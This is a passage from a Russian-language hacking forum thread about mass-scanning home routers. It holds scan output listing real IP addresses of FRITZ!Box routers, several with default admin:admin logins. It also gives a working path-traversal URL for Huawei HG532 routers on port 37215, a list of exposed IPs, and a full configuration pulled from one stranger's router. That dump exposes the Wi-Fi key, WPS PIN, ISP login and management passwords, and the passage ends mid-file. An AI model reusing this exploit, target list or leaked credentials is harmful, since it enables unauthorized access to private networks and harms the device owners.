Нарвался на кучу роутеров FRITZ!Box. RS пароль опрелеляет, но инфу не достаёт. Вот список. FRITZ это те, где admin:admin Spoiler: FRITS!Box "IP Address";"Port";"Time (ms)";"Status";"Authorization";"Server name / Realm name / Device type";"Radio Off";"Hidden";"BSSID";"ESSID";"Security";"Key";"WPS PIN";"LAN IP Address";"LAN Subnet Mask";"WAN IP Address";"WAN Subnet Mask";"WAN Gateway";"Domain Name Servers";"Latitude";"Longitude";"Comments" "188.77.90.208";"443";"78";"Done";"";"HTTPS Access";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"" "188.77.104.157";"443";"62";"Done";"";"HTTPS Access";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"" "188.77.111.40";"443";"62";"Done";"";"HTTPS Access";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"" "188.77.112.110";"443";"63";"Done";"";"HTTPS Access";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"" "188.77.114.246";"443";"62";"Done";"";"HTTPS Access";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"" "188.77.121.124";"443";"63";"Done";"support:<empty>";"HTTPS Access";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"" "188.77.123.143";"443";"63";"Done";"";"HTTPS Access";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"" "188.77.128.245";"443";"94";"Done";"";"HTTPS Access";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"" "188.77.146.168";"443";"47";"Done";"";"HTTPS Access";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"" "188.77.165.124";"443";"78";"Done";"";"HTTPS Access";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"" "188.77.167.110";"443";"63";"Done";"admin:admin";"HTTPS Access";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"" "188.77.167.234";"443";"62";"Done";"";"HTTPS Access";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"" "188.77.168.179";"443";"62";"Done";"";"HTTPS Access";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"" "188.77.182.39";"443";"78";"Done";"";"HTTPS Access";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"" "188.77.195.161";"443";"93";"Done";"";"HTTPS Access";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"" "188.77.220.197";"443";"62";"Done";"";"HTTPS Access";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"" "188.77.222.200";"443";"47";"Done";"admin:admin";"HTTPS Access";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"" "188.77.223.166";"443";"62";"Done";"";"HTTPS Access";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"" "188.77.237.51";"443";"3058";"Timed out";"";"HTTPS Access";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"" "188.77.245.208";"443";"172";"Done";"";"HTTPS Access";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"" "95.16.1.203";"443";"109";"Done";"";"HTTPS Access";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"" "95.16.2.3";"443";"78";"Done";"";"HTTPS Access";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"" "95.16.3.215";"443";"78";"Done";"";"HTTPS Access";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"" "95.16.9.36";"443";"94";"Done";"";"HTTPS Access";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"" "95.16.9.243";"443";"78";"Done";"admin:admin";"HTTPS Access";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"" "95.16.40.25";"443";"78";"Done";"";"HTTPS Access";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"" "95.16.52.168";"443";"93";"Done";"";"HTTPS Access";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"" "95.16.55.164";"443";"63";"Done";"";"HTTPS Access";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"" "95.16.60.77";"443";"78";"Done";"";"HTTPS Access";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"" "95.16.64.185";"443";"78";"Done";"";"HTTPS Access";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"" "95.16.67.241";"443";"93";"Done";"admin:admin";"HTTPS Access";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"" "95.16.80.249";"443";"265";"Done";"";"HTTPS Access";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"" "95.16.84.89";"443";"156";"Timed out";"";"HTTPS Access";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"" "95.16.84.158";"443";"156";"Done";"";"HTTPS Access";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"" "95.16.88.121";"443";"78";"Done";"";"HTTPS Access";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"" "95.16.90.39";"443";"140";"Done";"";"HTTPS Access";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"" "95.16.104.39";"443";"109";"Done";"admin:admin";"HTTPS Access";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"" "95.16.104.112";"443";"62";"Done";"";"HTTPS Access";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"" "95.16.114.238";"443";"63";"Done";"";"HTTPS Access";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"" "95.16.116.63";"443";"234";"Done";"";"HTTPS Access";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"" "95.16.117.7";"443";"63";"Done";"";"HTTPS Access";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"" "95.16.121.24";"443";"78";"Timed out";"";"HTTPS Access";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"";""
@tamer010151 ну и зачем все модули сканирования включать? Боитесь что-то пропустить? А ещё - версия на скриншоте определённо устарела, ZTE я исправлял.
Вроде там с авторизацией проблема. Пароля нет известного, по таймауту все и заканчивается. Вот так всегда, непонимаючи шаловливыми руками наклацаем и спрашиваем.
Ну вот у меня например 197.164.81.40 хоть и не логинится, но крякозябр в таблицу не пишет. Ещё обратил внимание, что диапазон в целом тормозной, ширина канала очень мала на стороне сканируемого провайдера. Таким большим количеством потоков его нельзя сканировать, можно вообще положить.
binarymaster, заметил что ZTE Router (locked for 59 sec.) а пароль подбирается дальше и другие уязвимости проверяются.
У меня тут нарисовалась огромная куча Huawei. Предположительно это HG532e. По нему вот нашлось https://github.com/ud2/advisories/tree/master/embedded/huawei/cve-2015-7254 За пару минут нашел кучу устройств с открытым 37215. Это можно как то эксплуатировать? http://image.prntscr.com/image/60406f1048824fc5bfca951565507232.png
Отвечаю сам себе. Эксплуатация возможна. По URL: http://IP:37215/icon/../../../var/curcfg.xml считывается текущий конфиг со всеми паролями и т.д. Spoiler: Список IP с открытым 37215 95.19.223.26 95.19.230.185 95.19.233.233 95.19.235.197 188.76.55.156 188.76.63.94 188.76.65.250 Spoiler: Конфиг полученый с 95.19.230.185 Code: <?xml version="1.0" ?> <InternetGatewayDeviceConfig> <InternetGatewayDevice> <DeviceInfo ProvisioningCode="JAZZ"> <X_PortalManagement Enable="0" PortalUrl-Computer="" PortalUrl-STB="" PortalUrl-Phone=""/> <X_ServiceManage FtpEnable="1" FtpUserName="ftp" FtpPassword="" FtpPort="21" FtpPath="/mnt" TelnetEnable="1" TelnetPort="23" SambaEnable="1"/> </DeviceInfo> <ManagementServer URL="https://acs.jazztel.com:8443" Username="" Password="" PeriodicInformEnable="1" PeriodicInformInterval="14400" ConnectionRequestUsername="9S5JJb5bnkbv" ConnectionRequestPassword="5Ms9EH3YkuXr" X_SSLCertEnable="0" X_ConnReqPort="8081"> <ObjExtention> <Username Notify="0" AccList="1" Resv="0"/> <URL Notify="0" AccList="1" Resv="0"/> <PeriodicInformInterval Notify="0" AccList="1" Resv="0"/> <PeriodicInformEnable Notify="0" AccList="1" Resv="0"/> <Password Notify="0" AccList="1" Resv="0"/> <ParameterKey Notify="0" AccList="1" Resv="0"/> <ConnectionRequestUsername Notify="0" AccList="1" Resv="0"/> <ConnectionRequestURL Notify="0" AccList="1" Resv="0"/> <ConnectionRequestPassword Notify="0" AccList="1" Resv="0"/> </ObjExtention> </ManagementServer> <Time Enable="1" NTPServer1="ntp1.jazztel.com" NTPServer2="ntp2.jazztel.com" NTPServer3="clock.sjc.he.net" NTPServer4="clock.via.net" NTPServer5="" LocalTimeZoneName="GMT+01:00" X_Label="29"/> <UserInterface> <X_Web Timeout="5"> <UserInfo NumberOfInstances="2"> <UserInfoInstance InstanceID="1" Username="admin" Userpassword="admin"/> <UserInfoInstance InstanceID="2" Username="user" Userpassword="user"/> </UserInfo> </X_Web> <X_Cli> <UserInfo NumberOfInstances="1"> <UserInfoInstance InstanceID="1" Username="admin" Userpassword="admin" Userlevel="0"/> </UserInfo> </X_Cli> </UserInterface> <X_SyslogConfig Enable="0" Level="Debug" DisplayLevel="Debug" LogServerEnable="0" MainServer="" MainServerPort="514" MinorServer="" MinorServerPort="514"/> <Layer3Forwarding X_AutoDefaultGatewayEnable="0" X_DefaultGatewayIPAddress="" DefaultConnectionService=""> </Layer3Forwarding> <LANDevice NumberOfInstances="1"> <LANDeviceInstance InstanceID="1" X_WLANEnable="1"> <LANHostConfigManagement DHCPServerEnable="1" MinAddress="192.168.1.2" MaxAddress="192.168.1.254" ReservedAddresses="" DNSServers="185.55.218.219,8.8.8.8" DomainName="" IPRouters="" DHCPLeaseTime="86400"> <DHCPConditionalServingPool NumberOfInstances="4"> <ObjExtention MaxInstanceNum="4"/> <DHCPConditionalServingPoolInstance InstanceID="1" Enable="1" MinAddress="0.0.0.0" MaxAddress="0.0.0.0" VendorClassID="STB" X_DeviveDhcpRelay="0" X_DeviceDhcpType=""/> <DHCPConditionalServingPoolInstance InstanceID="2" Enable="1" MinAddress="0.0.0.0" MaxAddress="0.0.0.0" VendorClassID="Phone" X_DeviveDhcpRelay="0" X_DeviceDhcpType=""/> <DHCPConditionalServingPoolInstance InstanceID="3" Enable="1" MinAddress="0.0.0.0" MaxAddress="0.0.0.0" VendorClassID="Camera" X_DeviveDhcpRelay="0" X_DeviceDhcpType=""/> <DHCPConditionalServingPoolInstance InstanceID="4" Enable="1" MinAddress="0.0.0.0" MaxAddress="0.0.0.0" VendorClassID="Computer" X_DeviveDhcpRelay="0" X_DeviceDhcpType=""/> </DHCPConditionalServingPool> <IPInterface NumberOfInstances="1"> <IPInterfaceInstance InstanceID="1" Enable="0" IPInterfaceIPAddress="192.168.1.1" IPInterfaceSubnetMask="255.255.255.0" IPInterfaceAddressingType="DHCP" X_RouteProtocolRx="Off" X_RIPOperation="Active"/> </IPInterface> </LANHostConfigManagement> <LANEthernetInterfaceConfig NumberOfInstances="4"> <ObjExtention MaxInstanceNum="4"/> <LANEthernetInterfaceConfigInstance InstanceID="1" Enable="1"> </LANEthernetInterfaceConfigInstance> <LANEthernetInterfaceConfigInstance InstanceID="2" Enable="1"> </LANEthernetInterfaceConfigInstance> <LANEthernetInterfaceConfigInstance InstanceID="3" Enable="1"> </LANEthernetInterfaceConfigInstance> <LANEthernetInterfaceConfigInstance InstanceID="4" Enable="1"> </LANEthernetInterfaceConfigInstance> </LANEthernetInterfaceConfig> <WLANConfiguration NumberOfInstances="4"> <WLANConfigurationInstance InstanceID="1" SSIDAdvertisementEnabled="1" Enable="1" MaxBitRate="Auto" Channel="6" AutoChannelEnable="1" RegulatoryDomain="ES" SSID="Jazztel_79" BeaconType="WPAand11i" MACAddressControlEnabled="0" Standard="b/g/n" WEPKeyIndex="1" WEPEncryptionLevel="104-bit" BasicEncryptionModes="None" BasicAuthenticationMode="None" WPAEncryptionModes="AESEncryption" WPAAuthenticationMode="PSKAuthentication" IEEE11iEncryptionModes="AESEncryption" IEEE11iAuthenticationMode="PSKAuthentication" WMMEnable="1" X_MixedEncryptionModes="AESEncryption" X_MixedAuthenticationMode="PSKAuthentication" X_PowerValue="20" X_AssociateDeviceNum="16" X_WlanMacFilterpolicy="0" X_WlanStaWakeEnable="0" X_WlanIsolateControl="0" X_Wlan11NBWControl="20" X_Wlan11NGIControl="long" X_Wlan11NHtMcs="33"> <WPS Enable="0" X_WPSMode="ap-pbc" DevicePassword="01576702" PinPhrase=""/> <WEPKey NumberOfInstances="4"> <WEPKeyInstance InstanceID="1" WEPKey="1111111111111"/> <WEPKeyInstance InstanceID="2" WEPKey="2222222222222"/> <WEPKeyInstance InstanceID="3" WEPKey="3333333333333"/> <WEPKeyInstance InstanceID="4" WEPKey="4444444444444"/> </WEPKey> <PreSharedKey NumberOfInstances="1"> <PreSharedKeyInstance InstanceID="1" PreSharedKey="EMGB3CDA"/> </PreSharedKey> </WLANConfigurationInstance> <WLANConfigurationInstance InstanceID="2" SSIDAdvertisementEnabled="1" Enable="0" MaxBitRate="Auto" Channel="6" AutoChannelEnable="1" RegulatoryDomain="GB" SSID="HG532c_2" BeaconType="Basic" MACAddressControlEnabled="0" Standard="b/g/n" WEPKeyIndex="1" WEPEncryptionLevel="104-bit" BasicEncryptionModes="None" BasicAuthenticationMode="None" WPAEncryptionModes="AESEncryption" WPAAuthenticationMode="PSKAuthentication" IEEE11iEncryptionModes="AESEncryption" IEEE11iAuthenticationMode="PSKAuthentication" WMMEnable="1" X_MixedEncryptionModes="AESEncryption" X_MixedAuthenticationMode="PSKAuthentication" X_PowerValue="20" X_AssociateDeviceNum="32" X_WlanMacFilterpolicy="0" X_WlanStaWakeEnable="0" X_WlanIsolateControl="0" X_Wlan11NBWControl="20" X_Wlan11NGIControl="long" X_Wlan11NHtMcs="33"> <WPS Enable="0" X_WPSMode="ap-pin" DevicePassword="01576702" PinPhrase=""/> <WEPKey NumberOfInstances="4"> <WEPKeyInstance InstanceID="1" WEPKey="1111111111111"/> <WEPKeyInstance InstanceID="2" WEPKey="2222222222222"/> <WEPKeyInstance InstanceID="3" WEPKey="3333333333333"/> <WEPKeyInstance InstanceID="4" WEPKey="4444444444444"/> </WEPKey> <PreSharedKey NumberOfInstances="1"> <PreSharedKeyInstance InstanceID="1" PreSharedKey="1234567890"/> </PreSharedKey> </WLANConfigurationInstance> <WLANConfigurationInstance InstanceID="3" SSIDAdvertisementEnabled="1" Enable="0" MaxBitRate="Auto" Channel="6" AutoChannelEnable="1" RegulatoryDomain="GB" SSID="HG532c_3" BeaconType="Basic" MACAddressControlEnabled="0" Standard="b/g/n" WEPKeyIndex="1" WEPEncryptionLevel="104-bit" BasicEncryptionModes="None" BasicAuthenticationMode="None" WPAEncryptionModes="AESEncryption" WPAAuthenticationMode="PSKAuthentication" IEEE11iEncryptionModes="AESEncryption" IEEE11iAuthenticationMode="PSKAuthentication" WMMEnable="1" X_MixedEncryptionModes="AESEncryption" X_MixedAuthenticationMode="PSKAuthentication" X_PowerValue="20" X_AssociateDeviceNum="32" X_WlanMacFilterpolicy="0" X_WlanStaWakeEnable="0" X_WlanIsolateControl="0" X_Wlan11NBWControl="20" X_Wlan11NGIControl="long" X_Wlan11NHtMcs="33"> <WPS Enable="0" X_WPSMode="ap-pin" DevicePassword="01576702" PinPhrase=""/> <WEPKey NumberOfInstances="4"> <WEPKeyInstance InstanceID="1" WEPKey="1111111111111"/> <WEPKeyInstance InstanceID="2" WEPKey="2222222222222"/> <WEPKeyInstance InstanceID="3" WEPKey="3333333333333"/> <WEPKeyInstance InstanceID="4" WEPKey="4444444444444"/> </WEPKey> <PreSharedKey NumberOfInstances="1"> <PreSharedKeyInstance InstanceID="1" PreSharedKey="1234567890"/> </PreSharedKey> </WLANConfigurationInstance> <WLANConfigurationInstance InstanceID="4" SSIDAdvertisementEnabled="1" Enable="0" MaxBitRate="Auto" Channel="6" AutoChannelEnable="1" RegulatoryDomain="GB" SSID="HG532c_4" BeaconType="Basic" MACAddressControlEnabled="0" Standard="b/g/n" WEPKeyIndex="1" WEPEncryptionLevel="104-bit" BasicEncryptionModes="None" BasicAuthenticationMode="None" WPAEncryptionModes="AESEncryption" WPAAuthenticationMode="PSKAuthentication" IEEE11iEncryptionModes="AESEncryption" IEEE11iAuthenticationMode="PSKAuthentication" WMMEnable="1" X_MixedEncryptionModes="AESEncryption" X_MixedAuthenticationMode="PSKAuthentication" X_PowerValue="20" X_AssociateDeviceNum="32" X_WlanMacFilterpolicy="0" X_WlanStaWakeEnable="0" X_WlanIsolateControl="0" X_Wlan11NBWControl="20" X_Wlan11NGIControl="long" X_Wlan11NHtMcs="33"> <WPS Enable="0" X_WPSMode="ap-pin" DevicePassword="01576702" PinPhrase=""/> <WEPKey NumberOfInstances="4"> <WEPKeyInstance InstanceID="1" WEPKey="1111111111111"/> <WEPKeyInstance InstanceID="2" WEPKey="2222222222222"/> <WEPKeyInstance InstanceID="3" WEPKey="3333333333333"/> <WEPKeyInstance InstanceID="4" WEPKey="4444444444444"/> </WEPKey> <PreSharedKey NumberOfInstances="1"> <PreSharedKeyInstance InstanceID="1" PreSharedKey="1234567890"/> </PreSharedKey> </WLANConfigurationInstance> </WLANConfiguration> <Hosts> </Hosts> </LANDeviceInstance> </LANDevice> <WANDevice NumberOfInstances="2"> <WANDeviceInstance InstanceID="1"> <WANCommonInterfaceConfig WANAccessType="DSL" Layer1UpstreamMaxBitRate="100000000" Layer1DownstreamMaxBitRate="100000000"> </WANCommonInterfaceConfig> <WANDSLInterfaceConfig Enable="1" X_ConfigMode="ALL"> <Stats> </Stats> </WANDSLInterfaceConfig> <X_WANUMTSInterfaceConfig Enable="1"> </X_WANUMTSInterfaceConfig> <WANConnectionDevice NumberOfInstances="1"> <ObjExtention MaxInstanceNum="4"/> <WANConnectionDeviceInstance InstanceID="1"> <ObjExtention> <WANPPPConnectionNumberOfEntries Notify="0" AccList="1" Resv="0"/> </ObjExtention> <X_WANUMTSLinkConfig Enable="0"/> <WANDSLLinkConfig Enable="1" LinkType="EoA" DestinationAddress="PVC:8/35" ATMEncapsulation="LLC" ATMQoS="UBR" ATMPeakCellRate="0" ATMMaximumBurstSize="0" ATMSustainableCellRate="0" X_VLANIDMark="-1" X_802-1pMark="-1"> <ObjExtention> <LinkType Notify="0" AccList="1" Resv="0"/> <DestinationAddress Notify="0" AccList="1" Resv="0"/> </ObjExtention> </WANDSLLinkConfig> <WANPPPConnection NumberOfInstances="1"> <WANPPPConnectionInstance InstanceID="1" Enable="1" PossibleConnectionTypes="IP_Routed,PPPoE_Bridged,DHCP_Spoofed" ConnectionType="IP_Routed" Name="" AutoDisconnectTime="0" IdleDisconnectTime="0" NATEnabled="1" Username="hg532c@jazztel" Password="hg532c" PPPAuthenticationProtocol="AUTO" MaxMRUSize="1492" MaxMTUSize="1492" X_TCP_MSS="0" DNSEnabled="1" DNSOverrideAllowed="1" DNSServers="" MACAddress="" MACAddressOverride="0" PPPoEACName="" PPPoEServiceName="" ConnectionTrigger="AlwaysOn" RouteProtocolRx="Off" X_RIPOperation="Passive" X_LanInterface="" X_ServiceList="INTERNET_TR069" X_DHCPRelay="0" X_APN="" X_DialNumber="" X_BackupDNSServers="87.216.1.65,87.216.1.66"> <ObjExtention> <Username Notify="0" AccList="1" Resv="0"/> <RouteProtocolRx Notify="0" AccList="1" Resv="0"/> <Password Notify="0" AccList="1" Resv="0"/> <PPPoEServiceName Notify="0" AccList="1" Resv="0"/> <PPPAuthenticationProtocol Notify="0" AccList="1" Resv="0"/> <Name Notify="0" AccList="1" Resv="0"/> <NATEnabled Notify="0" AccList="1" Resv="0"/> <Enable Notify="0" AccList="1" Resv="0"/> <DNSOverrideAllowed Notify="0" AccList="1" Resv="0"/> <DNSEnabled Notify="0" AccList="1" Resv="0"/> <CurrentMRUSize Notify="0" AccList="1" Resv="0"/> <ConnectionType Notify="0" AccList="1" Resv="0"/> </ObjExtention> <PortMapping NumberOfInstances="3"> <ObjExtention MaxInstanceNum="4"/> <PortMappingInstance InstanceID="1" PortMappingEnabled="1" RemoteHost="" ExternalPort="4662" ExternalPortEndRange="4662" InternalPort="4662" PortMappingProtocol="TCP" InternalClient="192.168.1.128" PortMappingDescription="eMule_TCP"/> <PortMappingInstance InstanceID="2" PortMappingEnabled="1" RemoteHost="" ExternalPort="4672" ExternalPortEndRange="4672" InternalPort="4672" PortMappingProtocol="UDP" InternalClient="192.168.1.128" PortMappingDescription="eMule_UDP"/> <PortMappingInstance InstanceID="4" PortMappingEnabled="1" RemoteHost="" ExternalPort="17740" ExternalPortEndRange="17740" InternalPort="17740" PortMappingProtocol="TCP/UDP" InternalClient="192.168.1.128" PortMappingDescription="Bit Comet"/> </PortMapping> <X_DMZ DMZEnable="0" DMZHostIPAddress=""/> </WANPPPConnectionInstance> </WANPPPConnection> </WANConnectionDeviceInstance> </WANConnectionDevice> </WANDeviceInstance> <WANDeviceInstance InstanceID="2"> <WANCommonInterfaceConfig WANAccessType="UMTS" Layer1UpstreamMaxBitRate="100000000" Layer1DownstreamMaxBitRate="100000000"> </WANCommonInterfaceConfig> <WANDSLInterfaceConfig Enable="1" X_ConfigMode="ALL"> <Stats> </Stats> </WANDSLInterfaceConfig> <X_WANUMTSInterfaceConfig Enable="1"> </X_WANUMTSInterfaceConfig> <WANConnectionDevice NumberOfInstances="1"> <ObjExtention MaxInstanceNum="4"/> <WANConnectionDeviceInstance InstanceID="1"> <X_WANUMTSLinkConfig Enable="1"/> <WANDSLLinkConfig Enable="1" LinkType="" DestinationAddress="" ATMEncapsulation="LLC" ATMQoS="UBR" ATMPeakCellRate="0" ATMMaximumBurstSize="0" ATMSustainableCellRate="0" X_VLANIDMark="-1" X_802-1pMark="-1"/> <WANPPPConnection NumberOfInstances="1"> <WANPPPConnectionInstance InstanceID="1" Enable="1" PossibleConnectionTypes="IP_Routed,PPPoE_Bridged,DHCP_Spoofed" ConnectionType="IP_Routed" Name="UMTS" AutoDisconnectTime="0" IdleDisconnectTime="0" NATEnabled="1" Username="abc" Password="123" PPPAuthenticationProtocol="AUTO" MaxMRUSize="1492" MaxMTUSize="1492" X_TCP_MSS="0" DNSEnabled="1" DNSOverrideAllowed="1" DNSServers="" MACAddress="" MACAddressOverride="0" PPPoEACName="" PPPoEServiceName="" ConnectionTrigger="AlwaysOn" RouteProtocolRx="Off" X_RIPOperation="Active" X_LanInterface="" X_ServiceList="INTERNET" X_DHCPRelay="0" X_APN="1234" X_DialNumber="*99#" X_BackupDNSServers="87.216.1.65,87.216.1.66"> <X_DMZ DMZEnable="0" DMZHostIPAddress=""/> </WANPPPConnectionInstance> </WANPPPConnection> </WANConnectionDeviceInstance> </WANConnectionDevice> </WANDeviceInstance> </WANDevice> <Layer2Bridging> <Bridge NumberOfInstances="1"> <BridgeInstance InstanceID="1" BridgeName="br0"/> </Bridge> </Layer2Bridging> <Services> <X_ALGAbility H323Enable="1" SIPEnable="0" SIPPort="5060" SIPWanPath="" RTSPEnable="1" L2TPEnable="1" IPSECEnable="1" PPTPEnable="1"/> <X_IPTV IGMPProxyEnable="0" IGMPSnoopingEnable="0" GroupNumber="32" WanList="" DownVersion="2"/> <X_UPnP Enable="0" TR064ConfigPwd="admin"/> <X_DmsService Enable="0" ContentDirectory="" ContentDirectoryUTF=""/> <X_Mirror Enable="0" LanInterface=""/> </Services> <X_FireWall CurrentLevel="Disable"> <FilterMode NumberOfInstances="7"> <ObjExtention MaxInstanceNum="7"/> <FilterModeInstance InstanceID="1" Level="Disable" Revisable="0" TotalNumberOfEntries="0" MacFilterPolicy="0" UrlFilterPolicy="0"> <DosAttack SynFlooding="0" IcmpFlooding="0" ArpAttack="0"/> </FilterModeInstance> <FilterModeInstance InstanceID="2" Level="Block-All" Revisable="2" TotalNumberOfEntries="0" MacFilterPolicy="0" UrlFilterPolicy="0"> <IpFilter NumberOfInstances="1"> <IpFilterInstance InstanceID="1" Name="Block" Status="2" Priority="255" Interface="ALL" SourceIPStart="" SourceIPEnd="" DestIPStart="" DestIPEnd="" Protocol="ALL" SourcePortStart="0" SourcePortEnd="0" DestPortStart="0" DestPortEnd="0"/> </IpFilter> <DosAttack SynFlooding="1" IcmpFlooding="0" ArpAttack="1"/> <ACL NumberOfInstances="1"> <ACLInstance InstanceID="1" X_Service="HTTP" X_Direction="LAN" X_StartIpAddr="" X_EndIpAddr=""/> </ACL> </FilterModeInstance> <FilterModeInstance InstanceID="3" Level="High" Revisable="2" TotalNumberOfEntries="0" MacFilterPolicy="0" UrlFilterPolicy="0"> <IpFilter NumberOfInstances="1"> <IpFilterInstance InstanceID="1" Name="High-Ip" Status="2" Priority="255" Interface="ALL" SourceIPStart="" SourceIPEnd="" DestIPStart="" DestIPEnd="" Protocol="ALL" SourcePortStart="0" SourcePortEnd="0" DestPortStart="0" DestPortEnd="0"/> </IpFilter> <AppFilter NumberOfInstances="3"> <ObjExtention MaxInstanceNum="3"/> <AppFilterInstance InstanceID="1" Name="DNS" Status="1" Protocol="UDP" Port="53"/> <AppFilterInstance InstanceID="2" Name="FTP" Status="1" Protocol="TCP" Port="21"/> <AppFilterInstance InstanceID="3" Name="HTTP" Status="1" Protocol="TCP" Port="80"/> </AppFilter> <DosAttack SynFlooding="1" IcmpFlooding="0" ArpAttack="1"/> <ACL NumberOfInstances="1"> <ACLInstance InstanceID="1" X_Service="HTTP" X_Direction="LAN" X_StartIpAddr="" X_EndIpAddr=""/> </ACL> </FilterModeInstance> <FilterModeInstance InstanceID="4" Level="Medium" Revisable="2" TotalNumberOfEntries="0" MacFilterPolicy="0" UrlFilterPolicy="0"> <IpFilter NumberOfInstances="1"> <IpFilterInstance InstanceID="1" Name="Middle-Ip" Status="2" Priority="255" Interface="ALL" SourceIPStart="" SourceIPEnd="" DestIPStart="" DestIPEnd="" Protocol="ALL" SourcePortStart="0" SourcePortEnd="0" DestPortStart="0" DestPortEnd="0"/> </IpFilter> <AppFilter NumberOfInstances="4"> <ObjExtention MaxInstanceNum="4"/> <AppFilterInstance InstanceID="1" Name="DNS" Status="1" Protocol="UDP" Port="53"/> <AppFilterInstance InstanceID="2" Name="FTP" Status="1" Protocol="TCP" Port="21"/> <AppFilterInstance InstanceID="3" Name="HTTP" Status="1" Protocol="TCP" Port="80"/> <AppFilterInstance InstanceID="4" Name="File Share" Status="1" Protocol="TCP/UDP" Port="137-139,445"/> </AppFilter> <DosAttack SynFlooding="0" IcmpFlooding="0" ArpAttack="0"/> <ACL NumberOfInstances="1"> <ACLInstance InstanceID="1" X_Service="HTTP" X_Direction="LAN" X_StartIpAddr="" X_EndIpAddr=""/> </ACL> </FilterModeInstance> <FilterModeInstance InstanceID="5" Level="Low" Revisable="2" TotalNumberOfEntries="0" MacFilterPolicy="0" UrlFilterPolicy="0"> <IpFilter NumberOfInstances="2"> <ObjExtention MaxInstanceNum="2"/> <IpFilterInstance InstanceID="1" Name="Low-Lan" Status="1" Priority="255" Interface="br0" SourceIPStart="" SourceIPEnd="" DestIPStart="" DestIPEnd="" Protocol="ALL" SourcePortStart="0" SourcePortEnd="0" DestPortStart="0" DestPortEnd="0"/> <IpFilterInstance InstanceID="2" Name="Low-All" Status="2" Priority="255" Interface="ALL" SourceIPStart="" SourceIPEnd="" DestIPStart="" DestIPEnd="" Protocol="ALL" SourcePortStart="0" SourcePortEnd="0" DestPortStart="0" DestPortEnd="0"/> </IpFilter> <DosAttack SynFlooding="0" IcmpFlooding="1" ArpAttack="0"/> <ACL NumberOfInstances="5"> <ObjExtention MaxInstanceNum="5"/> <ACLInstance InstanceID="1" X_Service="HTTP" X_Direction="LAN" X_StartIpAddr="" X_EndIpAddr=""/> <ACLInstance InstanceID="2" X_Service="ICMP" X_Direction="LAN" X_StartIpAddr="" X_EndIpAddr=""/> <ACLInstance InstanceID="3" X_Service="TELNET" X_Direction="LAN" X_StartIpAddr="" X_EndIpAddr=""/> <ACLInstance InstanceID="4" X_Service="HTTP" X_Direction="WAN" X_StartIpAddr="" X_EndIpAddr=""/> <ACLInstance InstanceID="5" X_Service="ICMP" X_Direction="WAN" X_StartIpAddr="" X_EndIpAddr=""/> </ACL> </FilterModeInstance> <FilterModeInstance InstanceID="6" Level="Standard" Revisable="2" TotalNumberOfEntries="0" MacFilterPolicy="0" UrlFilterPolicy="0"> <IpFilter NumberOfInstances="2"> <ObjExtention MaxInstanceNum="2"/> <IpFilterInstance InstanceID="1" Name="Std-Lan" Status="1" Priority="255" Interface="br0" SourceIPStart="" SourceIPEnd="" DestIPStart="" DestIPEnd="" Protocol="ALL" SourcePortStart="0" SourcePortEnd="0" DestPortStart="0" DestPortEnd="0"/> <IpFilterInstance InstanceID="2" Name="Std-All" Status="2" Priority="255" Interface="ALL" SourceIPStart="" SourceIPEnd="" DestIPStart="" DestIPEnd="" Protocol="ALL" SourcePortStart="0" SourcePortEnd="0" DestPortStart="0" DestPortEnd="0"/> </IpFilter> <DosAttack SynFlooding="0" IcmpFlooding="0" ArpAttack="0"/> <ACL NumberOfInstances="4"> <ObjExtention MaxInstanceNum="4"/> <ACLInstance InstanceID="1" X_Service="HTTP" X_Direction="LAN" X_StartIpAddr="" X_EndIpAddr=""/> <ACLInstance InstanceID="2" X_Service="ICMP" X_Direction="LAN" X_StartIpAddr="" X_EndIpAddr=""/> <ACLInstance InstanceID="3" X_Service="ACS" X_Direction="WAN" X_StartIpAddr="" X_EndIpAddr=""/> <ACLInstance InstanceID="4" X_Service="TELNET" X_Direction="LAN" X_StartIpAddr="" X_EndIpAddr=""/> </ACL> </FilterModeInstance> <FilterModeInstance InstanceID="7" Level="JAZZTEL" Revisable="1" TotalNumberOfEntries="0" MacFilterPolicy="0" UrlFilterPolicy="0"> <IpFilter NumberOfInstances="2"> <ObjExtention MaxInstanceNum="4"/> <IpFilterInstance InstanceID="3" Name="1" Status="1" Priority="0" Interface="ALL" SourceIPStart="87.216.1.1" SourceIPEnd="87.216.1.254" DestIPStart="" DestIPEnd="" 